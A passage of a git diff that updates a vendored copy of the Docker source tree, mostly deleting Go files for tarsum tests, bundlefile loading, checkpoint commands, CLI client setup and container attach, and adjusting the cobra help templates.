Remove(path string) error { - _, fullpath, err := c.normalize(path) - if err != nil { - return err - } - return os.RemoveAll(fullpath) -} diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go deleted file mode 100644 index 278e5830de..0000000000 --- a/vendor/github.com/docker/docker/builder/tarsum_test.go +++ /dev/null @@ -1,265 +0,0 @@ -package builder - -import ( - "bufio" - "bytes" - "io/ioutil" - "os" - "path/filepath" - "testing" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/reexec" -) - -const ( - filename = "test" - contents = "contents test" -) - -func init() { - reexec.Init() -} - -func TestCloseRootDirectory(t *testing.T) { - contextDir, err := ioutil.TempDir("", "builder-tarsum-test") - - if err != nil { - t.Fatalf("Error with creating temporary directory: %s", err) - } - - tarsum := &tarSumContext{root: contextDir} - - err = tarsum.Close() - - if err != nil { - t.Fatalf("Error while executing Close: %s", err) - } - - _, err = os.Stat(contextDir) - - if !os.IsNotExist(err) { - t.Fatalf("Directory should not exist at this point") - defer os.RemoveAll(contextDir) - } -} - -func TestOpenFile(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - createTestTempFile(t, contextDir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - file, err := tarSum.Open(filename) - - if err != nil { - t.Fatalf("Error when executing Open: %s", err) - } - - defer file.Close() - - scanner := bufio.NewScanner(file) - buff := bytes.NewBufferString("") - - for scanner.Scan() { - buff.WriteString(scanner.Text()) - } - - if contents != buff.String() { - t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String()) - } - -} - -func TestOpenNotExisting(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - tarSum := &tarSumContext{root: contextDir} - - file, err := tarSum.Open("not-existing") - - if file != nil { - t.Fatal("Opened file should be nil") - } - - if !os.IsNotExist(err) { - t.Fatalf("Error when executing Open: %s", err) - } -} - -func TestStatFile(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - testFilename := createTestTempFile(t, contextDir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - relPath, fileInfo, err := tarSum.Stat(filename) - - if err != nil { - t.Fatalf("Error when executing Stat: %s", err) - } - - if relPath != filename { - t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath) - } - - if fileInfo.Path() != testFilename { - t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) - } -} - -func TestStatSubdir(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - relativePath, err := filepath.Rel(contextDir, testFilename) - - if err != nil { - t.Fatalf("Error when getting relative path: %s", err) - } - - relPath, fileInfo, err := tarSum.Stat(relativePath) - - if err != nil { - t.Fatalf("Error when executing Stat: %s", err) - } - - if relPath != relativePath { - t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath) - } - - if fileInfo.Path() != testFilename { - t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) - } -} - -func TestStatNotExisting(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - tarSum := &tarSumContext{root: contextDir} - - relPath, fileInfo, err := tarSum.Stat("not-existing") - - if relPath != "" { - t.Fatal("Relative path should be nil") - } - - if fileInfo != nil { - t.Fatalf("File info should be nil") - } - - if !os.IsNotExist(err) { - t.Fatalf("This file should not exist: %s", err) - } -} - -func TestRemoveDirectory(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - relativePath, err := filepath.Rel(contextDir, contextSubdir) - - if err != nil { - t.Fatalf("Error when getting relative path: %s", err) - } - - tarSum := &tarSumContext{root: contextDir} - - err = tarSum.Remove(relativePath) - - if err != nil { - t.Fatalf("Error when executing Remove: %s", err) - } - - _, err = os.Stat(contextSubdir) - - if !os.IsNotExist(err) { - t.Fatalf("Directory should not exist at this point") - } -} - -func TestMakeTarSumContext(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - createTestTempFile(t, contextDir, filename, contents, 0777) - - tarStream, err := archive.Tar(contextDir, archive.Uncompressed) - - if err != nil { - t.Fatalf("error: %s", err) - } - - defer tarStream.Close() - - tarSum, err := MakeTarSumContext(tarStream) - - if err != nil { - t.Fatalf("Error when executing MakeTarSumContext: %s", err) - } - - if tarSum == nil { - t.Fatalf("Tar sum context should not be nil") - } -} - -func TestWalkWithoutError(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - createTestTempFile(t, contextSubdir, filename, contents, 0777) - - tarSum := &tarSumContext{root: contextDir} - - walkFun := func(path string, fi FileInfo, err error) error { - return nil - } - - err := tarSum.Walk(contextSubdir, walkFun) - - if err != nil { - t.Fatalf("Error when executing Walk: %s", err) - } -} - -type WalkError struct { -} - -func (we WalkError) Error() string { - return "Error when executing Walk" -} - -func TestWalkWithError(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() - - contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") - - tarSum := &tarSumContext{root: contextDir} - - walkFun := func(path string, fi FileInfo, err error) error { - return WalkError{} - } - - err := tarSum.Walk(contextSubdir, walkFun) - - if err == nil { - t.Fatalf("Error should not be nil") - } -} diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go index 139845cb1b..8ed1fddc06 100644 --- a/vendor/github.com/docker/docker/cli/cobra.go +++ b/vendor/github.com/docker/docker/cli/cobra.go @@ -1,9 +1,9 @@ -package cli +package cli // import "github.com/docker/docker/cli" import ( "fmt" - "strings" + "github.com/docker/docker/pkg/term" "github.com/spf13/cobra" ) @@ -14,11 +14,12 @@ func SetupRootCommand(rootCmd *cobra.Command) { cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands) cobra.AddTemplateFunc("operationSubCommands", operationSubCommands) cobra.AddTemplateFunc("managementSubCommands", managementSubCommands) + cobra.AddTemplateFunc("wrappedFlagUsages", wrappedFlagUsages) rootCmd.SetUsageTemplate(usageTemplate) rootCmd.SetHelpTemplate(helpTemplate) rootCmd.SetFlagErrorFunc(FlagErrorFunc) - rootCmd.SetHelpCommand(helpCommand) + rootCmd.SetVersionTemplate("Docker version {{.Version}}\n") rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage") rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help") @@ -28,7 +29,7 @@ func SetupRootCommand(rootCmd *cobra.Command) { // docker/docker/cli error messages func FlagErrorFunc(cmd *cobra.Command, err error) error { if err == nil { - return err + return nil } usage := "" @@ -41,23 +42,6 @@ func FlagErrorFunc(cmd *cobra.Command, err error) error { } } -var helpCommand = &cobra.Command{ - Use: "help [command]", - Short: "Help about the command", - PersistentPreRun: func(cmd *cobra.Command, args []string) {}, - PersistentPostRun: func(cmd *cobra.Command, args []string) {}, - RunE: func(c *cobra.Command, args []string) error { - cmd, args, e := c.Root().Find(args) - if cmd == nil || e != nil || len(args) > 0 { - return fmt.Errorf("unknown help topic: %v", strings.Join(args, " ")) - } - - helpFunc := cmd.HelpFunc() - helpFunc(cmd, args) - return nil - }, -} - func hasSubCommands(cmd *cobra.Command) bool { return len(operationSubCommands(cmd)) > 0 } @@ -67,7 +51,7 @@ func hasManagementSubCommands(cmd *cobra.Command) bool { } func operationSubCommands(cmd *cobra.Command) []*cobra.Command { - cmds := []*cobra.Command{} + var cmds []*cobra.Command for _, sub := range cmd.Commands() { if sub.IsAvailableCommand() && !sub.HasSubCommands() { cmds = append(cmds, sub) @@ -76,8 +60,16 @@ func operationSubCommands(cmd *cobra.Command) []*cobra.Command { return cmds } +func wrappedFlagUsages(cmd *cobra.Command) string { + width := 80 + if ws, err := term.GetWinsize(0); err == nil { + width = int(ws.Width) + } + return cmd.Flags().FlagUsagesWrapped(width - 1) +} + func managementSubCommands(cmd *cobra.Command) []*cobra.Command { - cmds := []*cobra.Command{} + var cmds []*cobra.Command for _, sub := range cmd.Commands() { if sub.IsAvailableCommand() && sub.HasSubCommands() { cmds = append(cmds, sub) @@ -105,10 +97,10 @@ Examples: {{ .Example }} {{- end}} -{{- if .HasFlags}} +{{- if .HasAvailableFlags}} Options: -{{.Flags.FlagUsages | trimRightSpace}} +{{ wrappedFlagUsages . | trimRightSpace}} {{- end}} {{- if hasManagementSubCommands . }} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go deleted file mode 100644 index 7fd1e4f6c4..0000000000 --- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go +++ /dev/null @@ -1,69 +0,0 @@ -package bundlefile - -import ( - "encoding/json" - "fmt" - "io" -) - -// Bundlefile stores the contents of a bundlefile -type Bundlefile struct { - Version string - Services map[string]Service -} - -// Service is a service from a bundlefile -type Service struct { - Image string - Command []string `json:",omitempty"` - Args []string `json:",omitempty"` - Env []string `json:",omitempty"` - Labels map[string]string `json:",omitempty"` - Ports []Port `json:",omitempty"` - WorkingDir *string `json:",omitempty"` - User *string `json:",omitempty"` - Networks []string `json:",omitempty"` -} - -// Port is a port as defined in a bundlefile -type Port struct { - Protocol string - Port uint32 -} - -// LoadFile loads a bundlefile from a path to the file -func LoadFile(reader io.Reader) (*Bundlefile, error) { - bundlefile := &Bundlefile{} - - decoder := json.NewDecoder(reader) - if err := decoder.Decode(bundlefile); err != nil { - switch jsonErr := err.(type) { - case *json.SyntaxError: - return nil, fmt.Errorf( - "JSON syntax error at byte %v: %s", - jsonErr.Offset, - jsonErr.Error()) - case *json.UnmarshalTypeError: - return nil, fmt.Errorf( - "Unexpected type at byte %v. Expected %s but received %s.", - jsonErr.Offset, - jsonErr.Type, - jsonErr.Value) - } - return nil, err - } - - return bundlefile, nil -} - -// Print writes the contents of the bundlefile to the output writer -// as human readable json -func Print(out io.Writer, bundle *Bundlefile) error { - bytes, err := json.MarshalIndent(*bundle, "", " ") - if err != nil { - return err - } - - _, err = out.Write(bytes) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go deleted file mode 100644 index c343410df3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go +++ /dev/null @@ -1,77 +0,0 @@ -package bundlefile - -import ( - "bytes" - "strings" - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestLoadFileV01Success(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": { - "redis": { - "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", - "Networks": ["default"] - }, - "web": { - "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", - "Networks": ["default"], - "User": "web" - } - } - }`) - - bundle, err := LoadFile(reader) - assert.NilError(t, err) - assert.Equal(t, bundle.Version, "0.1") - assert.Equal(t, len(bundle.Services), 2) -} - -func TestLoadFileSyntaxError(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": unquoted string - }`) - - _, err := LoadFile(reader) - assert.Error(t, err, "syntax error at byte 37: invalid character 'u'") -} - -func TestLoadFileTypeError(t *testing.T) { - reader := strings.NewReader(`{ - "Version": "0.1", - "Services": { - "web": { - "Image": "redis", - "Networks": "none" - } - } - }`) - - _, err := LoadFile(reader) - assert.Error(t, err, "Unexpected type at byte 94. Expected []string but received string") -} - -func TestPrint(t *testing.T) { - var buffer bytes.Buffer - bundle := &Bundlefile{ - Version: "0.1", - Services: map[string]Service{ - "web": { - Image: "image", - Command: []string{"echo", "something"}, - }, - }, - } - assert.NilError(t, Print(&buffer, bundle)) - output := buffer.String() - assert.Contains(t, output, "\"Image\": \"image\"") - assert.Contains(t, output, - `"Command": [ - "echo", - "something" - ]`) -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go deleted file mode 100644 index d5705a4dad..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go +++ /dev/null @@ -1,24 +0,0 @@ -package checkpoint - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental) -func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "checkpoint", - Short: "Manage checkpoints", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - Tags: map[string]string{"experimental": "", "version": "1.25"}, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go deleted file mode 100644 index 473a941733..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go +++ /dev/null @@ -1,58 +0,0 @@ -package checkpoint - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type createOptions struct { - container string - checkpoint string - checkpointDir string - leaveRunning bool -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts createOptions - - cmd := &cobra.Command{ - Use: "create [OPTIONS] CONTAINER CHECKPOINT", - Short: "Create a checkpoint from a running container", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - opts.checkpoint = args[1] - return runCreate(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint") - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - checkpointOpts := types.CheckpointCreateOptions{ - CheckpointID: opts.checkpoint, - CheckpointDir: opts.checkpointDir, - Exit: !opts.leaveRunning, - } - - err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts) - if err != nil { - return err - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go deleted file mode 100644 index daf8349993..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go +++ /dev/null @@ -1,62 +0,0 @@ -package checkpoint - -import ( - "fmt" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type listOptions struct { - checkpointDir string -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts listOptions - - cmd := &cobra.Command{ - Use: "ls [OPTIONS] CONTAINER", - Aliases: []string{"list"}, - Short: "List checkpoints for a container", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, args[0], opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd - -} - -func runList(dockerCli *command.DockerCli, container string, opts listOptions) error { - client := dockerCli.Client() - - listOpts := types.CheckpointListOptions{ - CheckpointDir: opts.checkpointDir, - } - - checkpoints, err := client.CheckpointList(context.Background(), container, listOpts) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - fmt.Fprintf(w, "CHECKPOINT NAME") - fmt.Fprintf(w, "\n") - - for _, checkpoint := range checkpoints { - fmt.Fprintf(w, "%s\t", checkpoint.Name) - fmt.Fprint(w, "\n") - } - - w.Flush() - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go deleted file mode 100644 index ec39fa7b55..0000000000 --- a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go +++ /dev/null @@ -1,44 +0,0 @@ -package checkpoint - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions struct { - checkpointDir string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] CONTAINER CHECKPOINT", - Aliases: []string{"remove"}, - Short: "Remove a checkpoint", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args[0], args[1], opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") - - return cmd -} - -func runRemove(dockerCli *command.DockerCli, container string, checkpoint string, opts removeOptions) error { - client := dockerCli.Client() - - removeOpts := types.CheckpointDeleteOptions{ - CheckpointID: checkpoint, - CheckpointDir: opts.checkpointDir, - } - - return client.CheckpointDelete(context.Background(), container, removeOpts) -} diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go deleted file mode 100644 index 6d1dd7472e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/cli.go +++ /dev/null @@ -1,260 +0,0 @@ -package command - -import ( - "errors" - "fmt" - "io" - "net/http" - "os" - "path/filepath" - "runtime" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/versions" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/cliconfig/configfile" - "github.com/docker/docker/cliconfig/credentials" - "github.com/docker/docker/client" - "github.com/docker/docker/dockerversion" - dopts "github.com/docker/docker/opts" - "github.com/docker/go-connections/sockets" - "github.com/docker/go-connections/tlsconfig" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// Streams is an interface which exposes the standard input and output streams -type Streams interface { - In() *InStream - Out() *OutStream - Err() io.Writer -} - -// DockerCli represents the docker command line client. -// Instances of the client can be returned from NewDockerCli. -type DockerCli struct { - configFile *configfile.ConfigFile - in *InStream - out *OutStream - err io.Writer - keyFile string - client client.APIClient - hasExperimental bool - defaultVersion string -} - -// HasExperimental returns true if experimental features are accessible. -func (cli *DockerCli) HasExperimental() bool { - return cli.hasExperimental -} - -// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified. -func (cli *DockerCli) DefaultVersion() string { - return cli.defaultVersion -} - -// Client returns the APIClient -func (cli *DockerCli) Client() client.APIClient { - return cli.client -} - -// Out returns the writer used for stdout -func (cli *DockerCli) Out() *OutStream { - return cli.out -} - -// Err returns the writer used for stderr -func (cli *DockerCli) Err() io.Writer { - return cli.err -} - -// In returns the reader used for stdin -func (cli *DockerCli) In() *InStream { - return cli.in -} - -// ShowHelp shows the command help. -func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error { - cmd.SetOutput(cli.err) - cmd.HelpFunc()(cmd, args) - return nil -} - -// ConfigFile returns the ConfigFile -func (cli *DockerCli) ConfigFile() *configfile.ConfigFile { - return cli.configFile -} - -// GetAllCredentials returns all of the credentials stored in all of the -// configured credential stores. -func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) { - auths := make(map[string]types.AuthConfig) - for registry := range cli.configFile.CredentialHelpers { - helper := cli.CredentialsStore(registry) - newAuths, err := helper.GetAll() - if err != nil { - return nil, err - } - addAll(auths, newAuths) - } - defaultStore := cli.CredentialsStore("") - newAuths, err := defaultStore.GetAll() - if err != nil { - return nil, err - } - addAll(auths, newAuths) - return auths, nil -} - -func addAll(to, from map[string]types.AuthConfig) { - for reg, ac := range from { - to[reg] = ac - } -} - -// CredentialsStore returns a new credentials store based -// on the settings provided in the configuration file. Empty string returns -// the default credential store. -func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store { - if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" { - return credentials.NewNativeStore(cli.configFile, helper) - } - return credentials.NewFileStore(cli.configFile) -} - -// getConfiguredCredentialStore returns the credential helper configured for the -// given registry, the default credsStore, or the empty string if neither are -// configured. -func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string { - if c.CredentialHelpers != nil && serverAddress != "" { - if helper, exists := c.CredentialHelpers[serverAddress]; exists { - return helper - } - } - return c.CredentialsStore -} - -// Initialize the dockerCli runs initialization that must happen after command -// line flags are parsed. -func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error { - cli.configFile = LoadDefaultConfigFile(cli.err) - - var err error - cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile) - if err != nil { - return err - } - - cli.defaultVersion = cli.client.ClientVersion() - - if opts.Common.TrustKey == "" { - cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) - } else { - cli.keyFile = opts.Common.TrustKey - } - - if ping, err := cli.client.Ping(context.Background()); err == nil { - cli.hasExperimental = ping.Experimental - - // since the new header was added in 1.25, assume server is 1.24 if header is not present. - if ping.APIVersion == "" { - ping.APIVersion = "1.24" - } - - // if server version is lower than the current cli, downgrade - if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) { - cli.client.UpdateClientVersion(ping.APIVersion) - } - } - return nil -} - -// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err. -func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli { - return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err} -} - -// LoadDefaultConfigFile attempts to load the default config file and returns -// an initialized ConfigFile struct if none is found. -func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile { - configFile, e := cliconfig.Load(cliconfig.ConfigDir()) - if e != nil { - fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e) - } - if !configFile.ContainsAuth() { - credentials.DetectDefaultStore(configFile) - } - return configFile -} - -// NewAPIClientFromFlags creates a new APIClient from command line flags -func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) { - host, err := getServerHost(opts.Hosts, opts.TLSOptions) - if err != nil { - return &client.Client{}, err - } - - customHeaders := configFile.HTTPHeaders - if customHeaders == nil { - customHeaders = map[string]string{} - } - customHeaders["User-Agent"] = UserAgent() - - verStr := api.DefaultVersion - if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" { - verStr = tmpStr - } - - httpClient, err := newHTTPClient(host, opts.TLSOptions) - if err != nil { - return &client.Client{}, err - } - - return client.NewClient(host, verStr, httpClient, customHeaders) -} - -func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) { - switch len(hosts) { - case 0: - host = os.Getenv("DOCKER_HOST") - case 1: - host = hosts[0] - default: - return "", errors.New("Please specify only one -H") - } - - host, err = dopts.ParseHost(tlsOptions != nil, host) - return -} - -func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) { - if tlsOptions == nil { - // let the api client configure the default transport. - return nil, nil - } - - config, err := tlsconfig.Client(*tlsOptions) - if err != nil { - return nil, err - } - tr := &http.Transport{ - TLSClientConfig: config, - } - proto, addr, _, err := client.ParseHost(host) - if err != nil { - return nil, err - } - - sockets.ConfigureTransport(tr, proto, addr) - - return &http.Client{ - Transport: tr, - }, nil -} - -// UserAgent returns the user agent string used for making API requests -func UserAgent() string { - return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")" -} diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go deleted file mode 100644 index d64d5680cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/commands/commands.go +++ /dev/null @@ -1,91 +0,0 @@ -package commands - -import ( - "os" - - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/checkpoint" - "github.com/docker/docker/cli/command/container" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/cli/command/network" - "github.com/docker/docker/cli/command/node" - "github.com/docker/docker/cli/command/plugin" - "github.com/docker/docker/cli/command/registry" - "github.com/docker/docker/cli/command/secret" - "github.com/docker/docker/cli/command/service" - "github.com/docker/docker/cli/command/stack" - "github.com/docker/docker/cli/command/swarm" - "github.com/docker/docker/cli/command/system" - "github.com/docker/docker/cli/command/volume" - "github.com/spf13/cobra" -) - -// AddCommands adds all the commands from cli/command to the root command -func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) { - cmd.AddCommand( - node.NewNodeCommand(dockerCli), - service.NewServiceCommand(dockerCli), - swarm.NewSwarmCommand(dockerCli), - secret.NewSecretCommand(dockerCli), - container.NewContainerCommand(dockerCli), - image.NewImageCommand(dockerCli), - system.NewSystemCommand(dockerCli), - container.NewRunCommand(dockerCli), - image.NewBuildCommand(dockerCli), - network.NewNetworkCommand(dockerCli), - hide(system.NewEventsCommand(dockerCli)), - registry.NewLoginCommand(dockerCli), - registry.NewLogoutCommand(dockerCli), - registry.NewSearchCommand(dockerCli), - system.NewVersionCommand(dockerCli), - volume.NewVolumeCommand(dockerCli), - hide(system.NewInfoCommand(dockerCli)), - hide(container.NewAttachCommand(dockerCli)), - hide(container.NewCommitCommand(dockerCli)), - hide(container.NewCopyCommand(dockerCli)), - hide(container.NewCreateCommand(dockerCli)), - hide(container.NewDiffCommand(dockerCli)), - hide(container.NewExecCommand(dockerCli)), - hide(container.NewExportCommand(dockerCli)), - hide(container.NewKillCommand(dockerCli)), - hide(container.NewLogsCommand(dockerCli)), - hide(container.NewPauseCommand(dockerCli)), - hide(container.NewPortCommand(dockerCli)), - hide(container.NewPsCommand(dockerCli)), - hide(container.NewRenameCommand(dockerCli)), - hide(container.NewRestartCommand(dockerCli)), - hide(container.NewRmCommand(dockerCli)), - hide(container.NewStartCommand(dockerCli)), - hide(container.NewStatsCommand(dockerCli)), - hide(container.NewStopCommand(dockerCli)), - hide(container.NewTopCommand(dockerCli)), - hide(container.NewUnpauseCommand(dockerCli)), - hide(container.NewUpdateCommand(dockerCli)), - hide(container.NewWaitCommand(dockerCli)), - hide(image.NewHistoryCommand(dockerCli)), - hide(image.NewImagesCommand(dockerCli)), - hide(image.NewImportCommand(dockerCli)), - hide(image.NewLoadCommand(dockerCli)), - hide(image.NewPullCommand(dockerCli)), - hide(image.NewPushCommand(dockerCli)), - hide(image.NewRemoveCommand(dockerCli)), - hide(image.NewSaveCommand(dockerCli)), - hide(image.NewTagCommand(dockerCli)), - hide(system.NewInspectCommand(dockerCli)), - stack.NewStackCommand(dockerCli), - stack.NewTopLevelDeployCommand(dockerCli), - checkpoint.NewCheckpointCommand(dockerCli), - plugin.NewPluginCommand(dockerCli), - ) - -} - -func hide(cmd *cobra.Command) *cobra.Command { - if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" { - return cmd - } - cmdCopy := *cmd - cmdCopy.Hidden = true - cmdCopy.Aliases = []string{} - return &cmdCopy -} diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go deleted file mode 100644 index 31bb109344..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/attach.go +++ /dev/null @@ -1,130 +0,0 @@ -package container - -import ( - "fmt" - "io" - "net/http/httputil" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/signal" - "github.com/spf13/cobra" -) - -type attachOptions struct { - noStdin bool - proxy bool - detachKeys string - - container string -} - -// NewAttachCommand creates a new cobra.Command for `docker attach` -func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts attachOptions - - cmd := &cobra.Command{ - Use: "attach [OPTIONS] CONTAINER", - Short: "Attach to a running container", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runAttach(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN") - flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process") - flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") - return cmd -} - -func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error { - ctx := context.Background() - client := dockerCli.Client() - - c, err := client.ContainerInspect(ctx, opts.container) - if err != nil { - return err - } - - if !c.State.Running { - return fmt.Errorf("You cannot attach to a stopped container, start it first") - } - - if c.State.Paused { - return fmt.Errorf("You cannot attach to a paused container, unpause it first") - } - - if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil { - return err - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - options := types.ContainerAttachOptions{ - Stream: true, - Stdin: !opts.noStdin && c.Config.OpenStdin, - Stdout: true, - Stderr: true, - DetachKeys: 